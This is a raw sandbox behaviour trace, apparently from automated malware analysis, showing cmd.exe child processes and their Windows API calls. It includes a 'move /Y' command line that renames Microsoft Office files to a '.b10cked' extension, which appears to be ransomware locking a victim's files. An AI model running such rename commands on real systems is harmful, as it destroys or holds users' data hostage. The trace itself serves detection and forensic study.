GetEnvironmentStringsW () returned 0x260210* [0172.155] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.155] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.156] GetConsoleOutputCP () returned 0x1b5 [0172.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.156] GetUserDefaultLCID () returned 0x409 [0172.156] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="1") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.157] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.157] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.158] GetConsoleTitleW (in: lpConsoleTitle=0x250930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.158] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.159] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.159] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.159] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.159] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.159] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.159] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.159] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.167] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.420] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.420] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.420] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.420] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.420] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.420] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.420] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.421] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.421] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.421] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.422] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf594, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf58c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf58c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.422] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.423] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.424] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.424] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0172.424] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0172.424] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~1.trx")) returned 0x2020 [0172.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x261f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.436] SetErrorMode (uMode=0x0) returned 0x0 [0172.436] SetErrorMode (uMode=0x1) returned 0x0 [0172.436] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cef1c, lpFilePart=0x1cef04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", lpFilePart=0x1cef04*="PPINTL~1.TRX") returned 0x3c [0172.436] SetErrorMode (uMode=0x0) returned 0x1 [0172.436] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.436] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0172.436] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0172.437] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~1.trx")) returned 0x2020 [0172.437] SetErrorMode (uMode=0x0) returned 0x0 [0172.437] SetErrorMode (uMode=0x1) returned 0x0 [0172.437] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cf398, lpFilePart=0x1cf130 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", lpFilePart=0x1cf130*="PPINTL~1.TRX") returned 0x3c [0172.437] SetErrorMode (uMode=0x0) returned 0x1 
[0172.437] SetErrorMode (uMode=0x0) returned 0x0 [0172.437] SetErrorMode (uMode=0x1) returned 0x0 [0172.437] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf5a0, lpFilePart=0x1cf130 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cf130*="PPINTL.DLL.trx_dll.b10cked") returned 0x4a [0172.437] SetErrorMode (uMode=0x0) returned 0x1 [0172.437] SetLastError (dwErrCode=0x0) [0172.437] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll.b10cked")) returned 0xffffffff [0172.437] GetLastError () returned 0x2 [0172.437] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ceaac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceaac) returned 0x262128 [0172.438] FindNextFileW (in: hFindFile=0x262128, lpFindFileData=0x1ceaac | out: lpFindFileData=0x1ceaac) returned 0 [0172.438] GetLastError () returned 0x12 [0172.438] FindClose (in: hFindFile=0x262128 | out: hFindFile=0x262128) returned 1 [0172.440] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x261cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x261cb8) returned 0x262128 [0172.440] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ced44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0172.440] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ced44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0172.440] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll")) returned 0x2020 [0172.440] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.441] FindClose (in: hFindFile=0x262128 | out: hFindFile=0x262128) returned 1 [0172.441] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cecf8 | out: _Buffer=" 1") returned 9 [0172.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.441] GetFileType (hFile=0x7) returned 0x2 [0172.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec84 | out: lpMode=0x1cec84) returned 1 [0172.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cecb8 | out: lpConsoleScreenBufferInfo=0x1cecb8) returned 1 [0172.441] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.442] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cecf8 | out: lpBuffer=" 1 file(s) 
moved.\r\n") returned 0x1a [0172.442] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cecdc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecdc*=0x1a) returned 1 [0172.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.443] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.443] SetConsoleInputExeNameW () returned 0x1 [0172.443] GetConsoleOutputCP () returned 0x1b5 [0172.443] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.443] exit (_Code=0) Process: id = "297" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a60" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23360 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 23361 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23362 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 23363 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23364 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23365 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23366 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23367 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23368 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23525 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23526 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23527 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23528 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23529 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 23530 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23531 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23532 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23533 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23534 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23535 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23536 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23537 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23538 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23539 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 23540 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23541 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23542 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 23543 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 23544 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 23545 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 23546 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 23547 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" 
filename = "" Region: id = 23548 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 365 os_tid = 0x9c0 [0172.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fad4 | out: lpSystemTimeAsFileTime=0x12fad4*(dwLowDateTime=0x9ca79ca0, dwHighDateTime=0x1d440a9)) [0172.397] GetCurrentProcessId () returned 0x9cc [0172.397] GetCurrentThreadId () returned 0x9c0 [0172.398] GetTickCount () returned 0x323e4 [0172.398] QueryPerformanceCounter (in: lpPerformanceCount=0x12facc | out: lpPerformanceCount=0x12facc*=22918676555) returned 1 [0172.398] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.398] __set_app_type (_Type=0x1) [0172.398] __p__fmode () returned 0x76b331f4 [0172.398] __p__commode () returned 0x76b331fc [0172.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.399] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.399] GetCurrentThreadId () returned 0x9c0 [0172.399] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c0) returned 0x38 [0172.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.399] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa64 | out: phkResult=0x12fa64*=0x0) returned 0x2 [0172.399] VirtualQuery (in: lpAddress=0x12fa9b, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x12f000, AllocationBase=0x30000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.400] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.400] GetConsoleOutputCP () returned 0x1b5 [0172.400] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.400] 